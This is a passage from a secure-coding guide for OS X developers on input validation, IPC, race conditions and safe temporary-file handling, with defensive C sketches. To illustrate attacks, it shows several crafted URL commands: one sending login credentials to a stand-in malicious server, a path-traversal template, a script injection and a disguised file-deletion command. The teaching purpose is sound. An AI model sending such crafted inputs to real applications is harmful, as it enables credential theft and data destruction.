● myapp://cmd/login_to?server_to_send_credentials=some.malicious.webserver.com

In general, don’t accept commands that include arbitrary URLs or complete pathnames.

If you accept text or other data in a URL command that you subsequently include in a function or method call, you could be subject to a format string attack (see “Format String Attacks” (page 34)) or a buffer overflow attack (see “Causing a Buffer Overflow” (page 33)). If you accept pathnames, be careful to guard against strings that might redirect a call to another directory; for example:

myapp://use_template?template=/../../../../../../../../some/other/file

Code Insertion

Unvalidated URL commands and text strings sometimes allow an attacker to insert code into a program, which the program then executes.
For example, if your application processes HTML and JavaScript when displaying text, and displays strings received through a URL command, an attacker could send a command something like this:

myapp://cmd/adduser='>">

Similarly, HTML and other scripting languages can be inserted through URLs, text fields, and other data inputs, such as command lines and even graphics or audio files. You should either not execute scripts in data from an untrusted source, or you should validate all such data to make sure it conforms to your expectations for input. Never assume that the data you receive is well formed and valid; hackers and malicious users will try every sort of malformed data they can think of to see what effect it has on your program.

Social Engineering

Social engineering (essentially tricking the user) can be used with unvalidated input vulnerabilities to turn a minor annoyance into a major problem. For example, if your program accepts a URL command to delete a file, but first displays a dialog requesting permission from the user, an attacker might be able to send a long-enough string to scroll the name of the file to be deleted past the end of the dialog. The attacker could trick the user into thinking they were deleting something innocuous, such as unneeded cached data. For example:

myapp://cmd/delete?file=cached data that is slowing down your system.,realfile

The user then might see a dialog with the text “Are you sure you want to delete cached data that is slowing down your system.” The name of the real file, in this scenario, is out of sight below the bottom of the dialog window. When the user clicks the “OK” button, however, the user’s real data is deleted.

Other examples of social engineering attacks include tricking a user into clicking on a link in a malicious web site or following a malicious URL.

For more information about social engineering, read “Designing Secure User Interfaces” (page 73).
Modifications to Archived Data

Archiving data, also known as object graph serialization, refers to converting a collection of interconnected objects into an architecture-independent stream of bytes that preserves the identity of and the relationships between the objects and values. Archives are used for writing data to a file, transmitting data between processes or across a network, or performing other types of data storage or exchange.

For example, in Cocoa, you can use a coder object to create and read from an archive, where a coder object is an instance of a concrete subclass of the abstract class NSCoder.

Object archives are problematic from a security perspective for several reasons.

First, an object archive expands into an object graph that can contain arbitrary instances of arbitrary classes. If an attacker substitutes an instance of a different class than you were expecting, you could get unexpected behavior.

Second, because an application must know the type of data stored in an archive in order to unarchive it, developers typically assume that the values being decoded are the same size and data type as the values they originally coded. However, when the data is stored in an insecure manner before being unarchived, this is not a safe assumption. If the archived data is not stored securely, it is possible for an attacker to modify the data before the application unarchives it.

If your initWithCoder: method does not carefully validate all the data it’s decoding to make sure it is well formed and does not exceed the memory space reserved for it, then by carefully crafting a corrupted archive, an attacker can cause a buffer overflow or trigger another vulnerability and possibly seize control of the system.
Third, some objects return a different object during unarchiving (see the NSKeyedUnarchiverDelegate method unarchiver:didDecodeObject:) or when they receive the message awakeAfterUsingCoder:. NSImage is one example of such a class: it may register itself for a name when unarchived, potentially taking the place of an image the application uses. An attacker might be able to take advantage of this to insert a maliciously corrupt image file into an application.

It’s worth keeping in mind that, even if you write completely safe code, there might still be security vulnerabilities in libraries called by your code. Specifically, the initWithCoder: methods of the superclasses of your classes are also involved in unarchiving.

To be completely safe, you should avoid using archived data as a serialization format for data that could potentially be stored or transmitted in an insecure fashion or that could potentially come from an untrusted source.

Note that nib files are archives, and these cautions apply equally to them. A nib file loaded from a signed application bundle should be trustable, but a nib file stored in an insecure location is not.

See “Risks of Unvalidated Input” (page 33) for more information on the risks of reading unvalidated input, “Securing File Operations” (page 47) for techniques you can use to keep your archive files secure, and the other sections in this chapter for details on validating input.

Fuzzing

Fuzzing, or fuzz testing, is the technique of randomly or selectively altering otherwise valid data and passing it to a program to see what happens. If the program crashes or otherwise misbehaves, that’s an indication of a potential vulnerability that might be exploitable. Fuzzing is a favorite tool of hackers who are looking for buffer overflows and the other types of vulnerabilities discussed in this chapter.
Because it will be employed by hackers against your program, you should use it first, so you can close any vulnerabilities before they do.

Although you can never prove that your program is completely free of vulnerabilities, you can at least get rid of any that are easy to find this way. In this case, the developer’s job is much easier than that of the hacker. Whereas the hacker has to not only find input fields that might be vulnerable, but also must determine the exact nature of the vulnerability and then craft an attack that exploits it, you need only find the vulnerability, then look at the source code to determine how to close it. You don’t need to prove that the problem is exploitable; just assume that someone will find a way to exploit it, and fix it before they get an opportunity to try.

Fuzzing is best done with scripts or short programs that randomly vary the input passed to a program. Depending on the type of input you’re testing (text field, URL, data file, and so forth), you can try HTML, JavaScript, extra long strings, normally illegal characters, and so forth. If the program crashes or does anything unexpected, you need to examine the source code that handles that input to see what the problem is, and fix it.

For example, if your program asks for a filename, you should attempt to enter a string longer than the maximum legal filename. Or, if there is a field that specifies the size of a block of data, attempt to use a data block larger than the one you indicated in the size field.

The most interesting values to try when fuzzing are usually boundary values. For example, if a variable contains a signed integer, try passing the maximum and minimum values allowed for a signed integer of that size, along with 0, 1, and -1. If a data field should contain a string with no fewer than 1 byte and no more than 42 bytes, try zero bytes, 1 byte, 42 bytes, and 43 bytes. And so on.
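The boundary values listed above are easy to generate mechanically. The following C sketch shows one possible way to do so; int_boundary_values and length_boundary_values are hypothetical helper names invented for this illustration, and the second function assumes that min_len is not greater than max_len. A real fuzzer would feed each generated value to the program under test, which is not shown here.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

/* Fill out[] with the boundary values suggested for a signed int:
 * the minimum, -1, 0, 1, and the maximum. Returns the number written. */
size_t int_boundary_values(int out[5])
{
    out[0] = INT_MIN;
    out[1] = -1;
    out[2] = 0;
    out[3] = 1;
    out[4] = INT_MAX;
    return 5;
}

/* Fill out[] with test lengths for a field whose valid length is
 * min_len..max_len inclusive (assumes min_len <= max_len): one below
 * the minimum, the minimum, the maximum, and one above the maximum.
 * Values that cannot be represented are skipped.
 * Returns the number of lengths written (at most 4). */
size_t length_boundary_values(size_t min_len, size_t max_len, size_t out[4])
{
    size_t count = 0;

    if (min_len > 0) {
        out[count++] = min_len - 1;
    }
    out[count++] = min_len;
    out[count++] = max_len;
    if (max_len < SIZE_MAX) {
        out[count++] = max_len + 1;
    }
    return count;
}
```

For the 1-to-42-byte field in the text, length_boundary_values(1, 42, out) yields the lengths 0, 1, 42, and 43.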
In addition to boundary values, you should also try values that are way, way outside the expected values. For example, if your application is expecting an image that is up to 2,000 pixels by 3,000 pixels, you might modify the size fields to claim that the image is 65,535 pixels by 65,535 pixels. Using large values can uncover integer overflow bugs (and in some cases, NULL pointer handling bugs when a memory allocation fails). See “Avoiding Integer Overflows And Underflows” (page 27) in “Avoiding Buffer Overflows And Underflows” (page 17) for more information about integer overflows.

Inserting additional bytes of data into the middle or end of a file can also be a useful fuzzing technique in some cases. For example, if a file’s header indicates that it contains 1024 bytes after the header, the fuzzer could add a 1025th byte. The fuzzer could add an additional row or column of data in an image file. And so on.

Interprocess Communication and Networking

When communicating with another process, the most important thing to remember is that you cannot generally verify that the other process has not been compromised. Thus, you must treat it as untrusted and potentially hostile. All interprocess communication is potentially vulnerable to attacks if you do not properly validate input, avoid race conditions, and perform any other tests that are appropriate when working with data from a potentially hostile source.

Above and beyond these risks, however, some forms of interprocess communication have specific risks inherent to the communication mechanism. This section describes some of those risks.

Mach messaging: When working with Mach messaging, it is important to never give the Mach task port of your process to any other.
If you do, you are effectively allowing that process to arbitrarily modify the address space of your process, which makes it trivial to compromise your process. Instead, you should create a Mach port specifically for communicating with a given client.

Note: Mach messaging in OS X is not a supported API. No backwards compatibility guarantees are made for applications that use it anyway.

Remote procedure calls (RPC) and Distributed Objects: If your application uses remote procedure calls or Distributed Objects, you are implicitly saying that you fully trust whatever process is at the other end of the connection. That process can call arbitrary functions within your code, and may even be able to arbitrarily overwrite portions of your code with malicious code. For this reason, you should avoid using remote procedure calls or Distributed Objects when communicating with potentially untrusted processes, and in particular, you should never use these communication technologies across a network boundary.

Shared Memory: If you intend to share memory across applications, be careful to allocate any memory on the heap in page-aligned, page-sized blocks. If you share a block of memory that is not a whole page (or worse, if you share some portion of your application’s stack), you may be providing the process at the other end with the ability to overwrite portions of your code, stack, or other data in ways that can produce incorrect behavior, and may even allow injection of arbitrary code.

In addition to these risks, some forms of shared memory can also be subject to race condition attacks. Specifically, memory mapped files can be replaced with other files between when you create the file and when you open it. See “Securing File Operations” (page 47) for more details.
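The advice above to allocate in page-aligned, page-sized blocks can be sketched in portable POSIX C as follows. This is a minimal illustration under stated assumptions, not a definitive implementation: round_up_to_pages and alloc_shareable are hypothetical names, the block is obtained with posix_memalign and released with free, and the mechanism actually used to share the block with another process is outside the scope of the sketch. Zero-filling the block is an extra precaution borrowed from the buffer underflow rules, so that no stale data is exposed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Round len up to a whole number of pages.
 * Returns 0 if len or page is 0, or if rounding up would overflow. */
size_t round_up_to_pages(size_t len, size_t page)
{
    size_t rem;

    if (len == 0 || page == 0) {
        return 0;
    }
    rem = len % page;
    if (rem == 0) {
        return len;
    }
    if (len > SIZE_MAX - (page - rem)) {
        return 0;               /* would wrap around */
    }
    return len + (page - rem);
}

/* Allocate a zero-filled, page-aligned block that covers whole pages only.
 * On success returns the block and stores its real size in *actual;
 * on failure returns NULL. Release the block with free(). */
void *alloc_shareable(size_t len, size_t *actual)
{
    long page = sysconf(_SC_PAGESIZE);
    size_t total;
    void *block = NULL;

    if (page <= 0) {
        return NULL;
    }
    total = round_up_to_pages(len, (size_t)page);
    if (total == 0) {
        return NULL;
    }
    if (posix_memalign(&block, (size_t)page, total) != 0) {
        return NULL;
    }
    memset(block, 0, total);    /* no stale data in the shared pages */
    *actual = total;
    return block;
}
```

Because the block starts on a page boundary and its size is a multiple of the page size, no unrelated heap data shares a page with it.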
Finally, named shared memory regions and memory mapped files can be accessed by any other process running as the user. For this reason, it is not safe to use non-anonymous shared memory for sending highly secret information between processes. Instead, allocate your shared memory region prior to creating the child process that needs to share that region, then pass IPC_PRIVATE as the key for shmget to ensure that the shared memory identifier is not easy to guess.

Note: Shared memory regions are detached if you call exec or other similar functions. If you need to pass data in a secure way across an exec boundary, you must pass the shared memory ID to the child process. Ideally, you should do this using a secure mechanism, such as a pipe created using a call to pipe.

After the last child process that needs to use a particular shared memory region is running, the process that created the region should call shmctl to remove the shared memory region. Doing so ensures that no further processes can attach to that region even if they manage to guess the region ID.

shmctl(id, IPC_RMID, NULL);

Signals: A signal, in this context, is a particular type of content-free message sent from one process to another in a UNIX-based operating system such as OS X. Any program can register a signal handler function to perform specific operations upon receiving a signal.

In general, it is not safe to do a significant amount of work in a signal handler. There are only a handful of library functions and system calls that are safe to use in a signal handler (referred to as async-signal-safe calls), and this makes it somewhat difficult to safely perform work inside a signal handler.

More importantly, however, as a programmer, you are not in control of when your application receives a signal.
Thus, if an attacker can cause a signal to be delivered to your process (by overflowing a socket buffer, for example), the attacker can cause your signal handler code to execute at any time, between any two lines of code in your application. This can be problematic if there are certain places where executing that code would be dangerous.

For example, in 2004, a signal handler race condition was found in open-source code present in many UNIX-based operating systems. This bug made it possible for a remote attacker to execute arbitrary code or to stop the FTP daemon from working by causing it to read data from a socket and execute commands while it was still running as the root user. [CVE-2004-0794]

For this reason, signal handlers should do the minimum amount of work possible, and should perform the bulk of the work at a known location within the application’s main program loop.

For example, in an application based on Foundation or Core Foundation, you can create a pair of connected sockets by calling socketpair, set the sockets to non-blocking (for example, by calling fcntl with the O_NONBLOCK flag), turn one end into a CFStream object by calling CFStreamCreatePairWithSocket, and then schedule that stream on your run loop. Then, you can install a minimal signal handler that uses the write system call (which is async-signal-safe according to POSIX.1) to write data into the other socket. When the signal handler returns, your run loop will be woken up by data on the other socket, and you can then handle the signal at your convenience.

Important: If you are writing to a socket in a signal handler and reading from it in a run loop on your main program thread, you must set the socket to non-blocking. If you do not, it is possible to cause your application to hang by sending it too many signals. The queue for a socket is of finite size.
When it fills up, if the socket is set to non-blocking, the write call fails, and the global variable errno is set to EAGAIN. If the socket is blocking, however, the write call blocks until the queue empties enough to write the data. If a write call in a signal handler blocks, this prevents the signal handler from returning execution to the run loop. If that run loop is responsible for reading data from the socket, the queue will never empty, the write call will never unblock, and your application will basically hang (at least until the write call is interrupted by another signal).

Race Conditions and Secure File Operations

When working with shared data, whether in the form of files, databases, network connections, shared memory, or other forms of interprocess communication, there are a number of easily made mistakes that can compromise security. This chapter describes many such pitfalls and how to avoid them.

Avoiding Race Conditions

A race condition exists when changes to the order of two or more events can cause a change in behavior. If the correct order of execution is required for the proper functioning of the program, this is a bug. If an attacker can take advantage of the situation to insert malicious code, change a filename, or otherwise interfere with the normal operation of the program, the race condition is a security vulnerability. Attackers can sometimes take advantage of small time gaps in the processing of code to interfere with the sequence of operations, which they then exploit.

OS X, like all modern operating systems, is a multitasking OS; that is, it allows multiple processes to run or appear to run simultaneously by rapidly switching among them on each processor. The advantages to the user are many and mostly obvious; the disadvantage, however, is that there is no guarantee that two consecutive operations in a given process are performed without any other process performing operations between them. In fact, when two processes are using the same resource (such as the same file), there is no guarantee that they will access that resource in any particular order unless both processes explicitly take steps to ensure it.

For example, if you open a file and then read from it, even though your application did nothing else between these two operations, some other process might alter the file after the file was opened and before it was read. If two different processes (in the same or different applications) were writing to the same file, there would be no way to know which one would write first and which would overwrite the data written by the other. Such situations cause security vulnerabilities.

There are two basic types of race condition that can be exploited: time of check–time of use (TOCTOU), and signal handling.

Time of Check Versus Time of Use

It is fairly common for an application to need to check some condition before undertaking an action. For example, it might check to see if a file exists before writing to it, or whether the user has access rights to read a file before opening it for reading. Because there is a time gap between the check and the use (even though it might be a fraction of a second), an attacker can sometimes use that gap to mount an attack. Thus, this is referred to as a time-of-check–time-of-use problem.

Temporary Files

A classic example is the case where an application writes temporary files to publicly accessible directories. You can set the file permissions of the temporary file to prevent another user from altering the file.
However, if the file already exists before you write to it, you could be overwriting data needed by another program, or you could be using a file prepared by an attacker, in which case it might be a hard link or symbolic link, redirecting your output to a file needed by the system or to a file controlled by the attacker.

To prevent this, programs often check to make sure a temporary file with a specific name does not already exist in the target directory. If such a file exists, the application deletes it or chooses a new name for the temporary file to avoid conflict. If the file does not exist, the application opens the file for writing, because the system routine that opens a file for writing automatically creates a new file if none exists.

An attacker, by continuously running a program that creates a new temporary file with the appropriate name, can (with a little persistence and some luck) create the file in the gap between when the application checked to make sure the temporary file didn’t exist and when it opens it for writing. The application then opens the attacker’s file and writes to it (remember, the system routine opens an existing file if there is one, and creates a new file only if there is no existing file).

The attacker’s file might have different access permissions than the application’s temporary file, so the attacker can then read the contents. Alternatively, the attacker might have the file already open. The attacker could replace the file with a hard link or symbolic link to some other file (either one owned by the attacker or an existing system file). For example, the attacker could replace the file with a symbolic link to the system password file, so that after the attack, the system passwords have been corrupted to the point that no one, including the system administrator, can log in.
For a real-world example, in a vulnerability in a directory server, a server script wrote private and public keys into temporary files, then read those keys and put them into a database. Because the temporary files were in a publicly writable directory, an attacker could have created a race condition by substituting the attacker’s own files (or hard links or symbolic links to the attacker’s files) before the keys were reread, thus causing the script to insert the attacker’s private and public keys instead. After that, anything encrypted or authenticated using those keys would be under the attacker’s control. Alternatively, the attacker could have read the private keys, which can be used to decrypt encrypted data. [CVE-2005-2519]

Similarly, if an application temporarily relaxes permissions on files or folders in order to perform some operation, an attacker might be able to create a race condition by carefully timing his or her attack to occur in the narrow window in which those permissions are relaxed.

To learn more about creating temporary files securely, read “Create Temporary Files Correctly” (page 50).

Interprocess Communication

Time-of-check–time-of-use problems do not have to involve files, of course. They can apply to any data storage or communications mechanism that does not perform operations atomically.

Suppose, for example, that you wrote a program designed to automatically count the number of people entering a sports stadium for a game. Each turnstile talks to a web service running on a server whenever someone walks through. Each web service instance inherently runs as a separate process. Each time a turnstile sends a signal, an instance of the web service starts up, retrieves the gate count from a database, increments it by one, and writes it back to the database. Thus, multiple processes are keeping a single running total.
Now suppose two people enter different gates at exactly the same time. The sequence of events might then be as follows:

1. Server process A receives a request from gate A.
2. Server process B receives a request from gate B.
3. Server process A reads the number 1000 from the database.
4. Server process B reads the number 1000 from the database.
5. Server process A increments the gate count by 1 so that Gate == 1001.
6. Server process B increments the gate count by 1 so that Gate == 1001.
7. Server process A writes 1001 as the new gate count.
8. Server process B writes 1001 as the new gate count.

Because server process B read the gate count before process A had time to increment it and write it back, both processes read the same value. After process A increments the gate count and writes it back, process B overwrites the value of the gate count with the same value written by process A. Because of this race condition, one of the two people entering the stadium was not counted. Since there might be long lines at each turnstile, this condition might occur many times before a big game, and a dishonest ticket clerk who knew about this undercount could pocket some of the receipts with no fear of being caught.

Other race conditions that can be exploited, like the example above, involve the use of shared data or other interprocess communication methods. If an attacker can interfere with important data after it is written and before it is re-read, he or she can disrupt the operation of the program, alter data, or do other mischief. The use of non-thread-safe calls in multithreaded programs can result in data corruption. If an attacker can manipulate the program to cause two such threads to interfere with each other, it may be possible to mount a denial-of-service attack.
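As a rough illustration of how cooperating processes can avoid the lost update in the turnstile sequence, the following C sketch keeps the count in a small file and holds an exclusive flock lock for the whole read-increment-write sequence. The function name increment_gate_count, the file-based storage, and the decimal on-disk format are assumptions made for illustration only; the original example uses a database, where a transaction or an atomic update would play the same role.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/file.h>
#include <unistd.h>

/* Hypothetical helper: atomically add one to a decimal counter stored in
 * the file at `path`. Returns the new count, or -1 on error. */
long increment_gate_count(const char *path)
{
    int fd = open(path, O_RDWR | O_CREAT, 0600);
    if (fd < 0)
        return -1;

    /* Block until no other cooperating process holds the lock. */
    if (flock(fd, LOCK_EX) != 0) {
        close(fd);
        return -1;
    }

    char buf[32] = {0};
    long count = 0;
    ssize_t n = pread(fd, buf, sizeof(buf) - 1, 0);
    if (n < 0) {
        close(fd);              /* closing the descriptor drops the lock */
        return -1;
    }
    if (n > 0)
        count = strtol(buf, NULL, 10);
    count += 1;

    /* Rewrite the file while still holding the lock. */
    int len = snprintf(buf, sizeof(buf), "%ld\n", count);
    if (ftruncate(fd, 0) != 0 || pwrite(fd, buf, (size_t)len, 0) != len) {
        close(fd);
        return -1;
    }

    close(fd);                  /* releases the lock */
    return count;
}
```

Because the read and the write happen under one lock, process B cannot read 1000 until process A has written 1001. Such a lock is advisory: it protects only against processes that take the same lock.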
In some cases, by using such a race condition to overwrite a buffer in the heap with more data than the buffer can hold, an attacker can cause a buffer overflow. As discussed in “Avoiding Buffer Overflows And Underflows” (page 17), buffer overflows can be exploited to cause execution of malicious code.

The solution to race conditions involving shared data is to use a locking mechanism to prevent one process from changing a variable until another is finished with it. There are problems and hazards associated with such mechanisms, however, and they must be implemented carefully. And, of course, locking mechanisms only apply to processes that participate in the locking scheme. They cannot prevent an untrusted application from modifying the data maliciously. For a full discussion, see Wheeler, Secure Programming for Linux and Unix HOWTO, at http://www.dwheeler.com/secure-programs/.

Time-of-check–time-of-use vulnerabilities can be prevented in different ways, depending largely on the domain of the problem. When working with shared data, you should use locking to protect that data from other instances of your code. When working with data in publicly writable directories, you should also take the precautions described in “Files In Publicly Writable Directories Are Dangerous” (page 51).

Signal Handling

Because signal handlers execute code at arbitrary times, they can be used to cause incorrect behavior. In daemons running as root, running the wrong code at the wrong time can even cause privilege escalation. “Securing Signal Handlers” (page 46) describes this problem in more detail.

Securing Signal Handlers

Signal handlers are another common source of race conditions. Signals from the operating system to a process or between two processes are used for such purposes as terminating a process or causing it to reinitialize.

If you include signal handlers in your program, they should not make any system calls and should terminate as quickly as possible.
Although there are certain system calls that are safe from within signal handlers, writing a safe signal handler that does so is tricky. The best thing to do is to set a flag that your program checks periodically, and do no other work within the signal handler. This is because the signal handler can be interrupted by a new signal before it finishes processing the first signal, leaving the system in an unpredictable state or, worse, providing a vulnerability for an attacker to exploit.

For example, in 1997, a vulnerability was reported in a number of implementations of the FTP protocol in which a user could cause a race condition by closing an FTP connection. Closing the connection resulted in the near-simultaneous transmission of two signals to the FTP server: one to abort the current operation, and one to log out the user. The race condition occurred when the logout signal arrived just before the abort signal.

When a user logged onto an FTP server as an anonymous user, the server would temporarily downgrade its privileges from root to nobody so that the logged-in user had no privileges to write files. When the user logged out, however, the server reassumed root privileges. If the abort signal arrived at just the right time, it would abort the logout procedure after the server had assumed root privileges but before it had logged out the user. The user would then be logged in with root privileges, and could proceed to write files at will. An attacker could exploit this vulnerability with a graphical FTP client simply by repeatedly clicking the “Cancel” button. [CVE-1999-0035]

For a brief introduction to signal handlers, see the Little Unix Programmers Group site at http://users.actcom.co.il/~choo/lupg/tutorials/signals/signals-programming.html.
For a discourse on how signal handler race conditions can be exploited, see the article by Michal Zalewski at http://www.bindview.com/Services/razor/Papers/2001/signals.cfm.

Securing File Operations

Insecure file operations are a major source of security vulnerabilities. In some cases, opening or writing to a file in an insecure fashion can give attackers the opportunity to create a race condition (see “Time of Check Versus Time of Use” (page 44)). Often, however, insecure file operations give an attacker the ability to read confidential information, perform a denial of service attack, take control of an application, or even take control of the entire system.

This section discusses what you should do to make your file operations more secure.

Check Result Codes

Always check the result codes of every routine that you call. Be prepared to handle the situation if the operation fails. Most file-based security vulnerabilities could have been avoided if the developers of the programs had checked result codes.

Some common mistakes are listed below.

When writing to files or changing file permissions

A failure to change permissions on a file or to open a file for writing can be caused by many things, including:

● Insufficient permissions on the file or enclosing directory.
● The immutable flag (set with the chflags utility or the chflags system call).
● A network volume becoming unavailable.
● An external drive getting unplugged.
● A drive failure.

Depending on the nature of your software, any one of these could potentially be exploited if you do not properly check error codes.

See the manual pages for the chflags, chown, and chgrp commands and the chflags and chown functions for more information.

When removing files

Although the rm command can often ignore permissions if you pass the -f flag, it can still fail.
For example, you can’t remove a directory that has anything inside it. If a directory is in a location where other users have access to it, any attempt to remove the directory might fail because another process might add new files while you are removing the old ones.

The safest way to fix this problem is to use a private directory that no one else has access to. If that’s not possible, check to make sure the rm command succeeded and be prepared to handle failures.

Watch Out for Hard Links

A hard link is a second name for a file: the file appears to be in two different locations with two different names.

If a file has two (or more) hard links and you check the file to make sure that the ownership, permissions, and so forth are all correct, but fail to check the number of links to the file, an attacker can write to or read from the file through their own link in their own directory. Therefore, among other checks before you use a file, you should check the number of links.

Do not, however, simply fail if there’s a second link to a file, because there are some circumstances where a link is okay or even expected. For example, every directory is linked into at least two places in the hierarchy: the directory name itself and the special . record from the directory that links back to itself. Also, if that directory contains other directories, each of those subdirectories contains a .. record that points to the outer directory.

You need to anticipate such conditions and allow for them. Even if the link is unexpected, you need to handle the situation gracefully. Otherwise, an attacker can cause denial of service just by creating a link to the file. Instead, you should notify the user of the situation, giving them as much information as possible so they can try to track down the source of the problem.
Watch Out for Symbolic Links

A symbolic link is a special type of file that contains a path name. Symbolic links are more common than hard links.

Functions that follow symbolic links automatically open, read, or write to the file whose path name is in the symbolic link file rather than the symbolic link file itself. Your application receives no notification that a symbolic link was followed; to your application, it appears as if the file addressed is the one that was used.

An attacker can use a symbolic link, for example, to cause your application to write the contents intended for a temporary file to a critical system file instead, thus corrupting the system. Alternatively, the attacker can capture data you are writing or can substitute the attacker’s data for your own when you read the temporary file.

In general, you should avoid functions, such as chown and stat, that follow symbolic links (see Table 4-1 (page 55) for alternatives). As with hard links, your program should evaluate whether a symbolic link is acceptable, and if not, should handle the situation gracefully.

Case-Insensitive File Systems Can Thwart Your Security Model

In OS X, any partition (including the boot volume) can be either case-sensitive, case-insensitive but case-preserving, or, for non-boot volumes, case-insensitive. For example, HFS+ can be either case-sensitive or case-insensitive but case-preserving. FAT32 is case-insensitive but case-preserving. FAT12, FAT16, and ISO-9660 (without extensions) are case-insensitive.

An application that is unaware of the differences in behavior between these volume formats can cause serious security holes if you are not careful. In particular:

● If your program uses its own permission model to provide or deny access (for example, a web server that allows access only to files within a particular directory), you must either enforce this with a chroot jail or be vigilant about ensuring that you correctly identify paths even in a case-insensitive world.
Among other things, this means that you should ideally use a whitelisting scheme rather than a blacklisting scheme (with the default behavior being “deny”). If this is not possible, for correctness, you must compare each individual path part against your blacklist using case-sensitive or case-insensitive comparisons, depending on what type of volume the file resides on.

For example, if your program has a blacklist that prevents users from uploading or downloading the file /etc/ssh_host_key, if your software is installed on a case-insensitive volume, you must also reject someone who makes a request for /etc/SSH_host_key, /ETC/SSH_HOST_KEY, or even /ETC/ssh_host_key.

● If your program periodically accesses a file on a case-sensitive volume using the wrong mix of uppercase and lowercase letters, the open call will fail... until someone creates a second file with the name your program is actually asking for.

If someone creates such a file, your application will dutifully load data from the wrong file. If the contents of that file affect your application’s behavior in some important way, this represents a potential attack vector.

This also presents a potential attack vector if that file is an optional part of your application bundle that gets loaded by dyld when your application is launched.

Create Temporary Files Correctly

The temporary directories in OS X are shared among multiple users. This requires that they be writable by multiple users. Any time you work on files in a location to which others have read/write access, there’s the potential for the file to be compromised or corrupted.

The following list explains how to create temporary files using APIs at various layers of OS X.

POSIX Layer

In general, you should always use the mkstemp function to create temporary files at the POSIX layer.
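As a minimal sketch of the mkstemp approach, the following C function builds a name template inside a caller-supplied directory, lets mkstemp create the file exclusively, and then writes through the returned descriptor. The function name write_temp_file, the "example.XXXXXX" template, and the choice to unlink the file on a failed write are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: create a uniquely named temporary file in `dir`
 * and write `data` to it. On success, returns an open descriptor and
 * leaves the generated path in `path_out`; returns -1 on error. */
int write_temp_file(const char *dir, const char *data,
                    char *path_out, size_t path_len)
{
    /* mkstemp requires a template that ends in six X characters. */
    int n = snprintf(path_out, path_len, "%s/example.XXXXXX", dir);
    if (n < 0 || (size_t)n >= path_len)
        return -1;

    /* mkstemp replaces the X's and creates the file exclusively, so an
     * existing file or link with the same name is never opened. */
    int fd = mkstemp(path_out);
    if (fd < 0)
        return -1;

    size_t len = strlen(data);
    if (write(fd, data, len) != (ssize_t)len) {
        close(fd);
        unlink(path_out);
        return -1;
    }
    return fd;   /* keep using the descriptor, not the path */
}
```

The caller is expected to keep the descriptor open for as long as it needs the file, rather than closing it and reopening the path later.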
The mkstemp function guarantees a unique filename and returns a file descriptor, thus allowing you to skip the step of checking the open function result for an error, which might require you to change the filename and call open again.

If you must create a temporary file in a public directory manually, you can use the open function with the O_CREAT and O_EXCL flags set to create the file and obtain a file descriptor. The O_EXCL flag causes this function to return an error if the file already exists. Be sure to check for errors before proceeding.

After you’ve opened the file and obtained a file descriptor, you can safely use functions that take file descriptors, such as the standard C functions write and read, for as long as you keep the file open. See the manual pages for open(2), mkstemp(3), write(2), and read(2) for more on these functions, and see Wheeler, Secure Programming for Linux and Unix HOWTO for advantages and shortcomings to using these functions.

Carbon

To find the default location to store temporary files, you can call the FSFindFolder function and specify a directory type of kTemporaryFolderType. This function checks to see whether the UID calling the function owns the directory and, if not, returns the user home directory in ~/Library. Therefore, this function returns a relatively safe place to store temporary files. This location is not as secure as a directory that you created and that is accessible only by your program. The FSFindFolder function is documented in Folder Manager Reference.

If you’ve obtained the file reference of a directory (from the FSFindFolder function, for example), you can use the FSRefMakePath function to obtain the directory’s path name. However, be sure to check the function result, because if the FSFindFolder function fails, it returns a null string. If you don’t check the function result, you might end up trying to create a temporary file with a pathname formed by appending a filename to a null string.

Cocoa

There are no Cocoa methods that create a file and return a file descriptor. However, you can call the standard C open function from an Objective-C program to obtain a file descriptor (see “Working With Publicly Writable Files Using POSIX Calls” (page 54)). Or you can call the mkstemp function to create a temporary file and obtain a file descriptor. Then you can use the NSFileHandle method initWithFileDescriptor: to initialize a file handle, and other NSFileHandle methods to safely write to or read from the file. Documentation for the NSFileHandle class is in Foundation Framework Reference.

To obtain the path to the default location to store temporary files (stored in the $TMPDIR environment variable), you can use the NSTemporaryDirectory function, which calls the FSFindFolder and FSRefMakePath functions for you (see “Working With Publicly Writable Files Using Carbon” (page 55)). Note that NSTemporaryDirectory can return /tmp under certain circumstances such as if you link on a pre-OS X v10.3 development target. Therefore, if you’re using NSTemporaryDirectory, you either have to be sure that using /tmp is suitable for your operation or, if not, you should consider that an error case and create a more secure temporary directory if that happens.

The changeFileAttributes:atPath: method in the NSFileManager class is similar to chmod or chown, in that it takes a file path rather than a file descriptor. You shouldn’t use this method if you’re working in a public directory or a user’s home directory. Instead, call the fchown or fchmod function (see Table 4-1 (page 55)). You can call the NSFileHandle class’s fileDescriptor method to get the file descriptor of a file in use by NSFileHandle.

In addition, when working with temporary files, you should avoid the writeToFile:atomically: methods of NSString and NSData.
These are designed to minimize the risk of data loss when writing to a file, but do so in a way that is not recommended for use in directories that are writable by others. See “Working With Publicly Writable Files Using Cocoa” (page 56) for details.

Files in Publicly Writable Directories Are Dangerous

Files in publicly writable directories must be treated as inherently untrusted. An attacker can delete the file and replace it with another file, replace it with a symbolic link to another file, create the file ahead of time, and so on. There are ways to mitigate each of these attacks to some degree, but the best way to prevent them is to not read or write files in a publicly writable directory in the first place. If possible, you should create a subdirectory with tightly controlled permissions, then write your files inside that subdirectory.

If you must work in a directory to which your process does not have exclusive access, however, you must check to make sure a file does not exist before you create it. You must also verify that the file you intend to read from or write to is the same file that you created.

To this end, you should always use routines that operate on file descriptors rather than pathnames wherever possible, so that you can be certain you’re always dealing with the same file. To do this, pass the O_CREAT and O_EXCL flags to the open system call. This creates a file, but fails if the file already exists.

Note: If you cannot use file descriptors directly for some reason, you should explicitly create files as a separate step from opening them. Although this does not prevent someone from swapping in a new file between those operations, at least it narrows the attack window by making it possible to detect if the file already exists.

Before you create the file, however, you should first set your process’s file creation mask (umask).
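Putting these two pieces of advice together, a minimal C sketch of exclusive creation under a restrictive file creation mask might look like the following. The function name create_exclusive is hypothetical, and restoring the previous mask afterward is a design choice of this sketch rather than something the text requires.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: create `path` only if nothing already exists under
 * that name, accessible to the owner alone. Returns a descriptor, or -1
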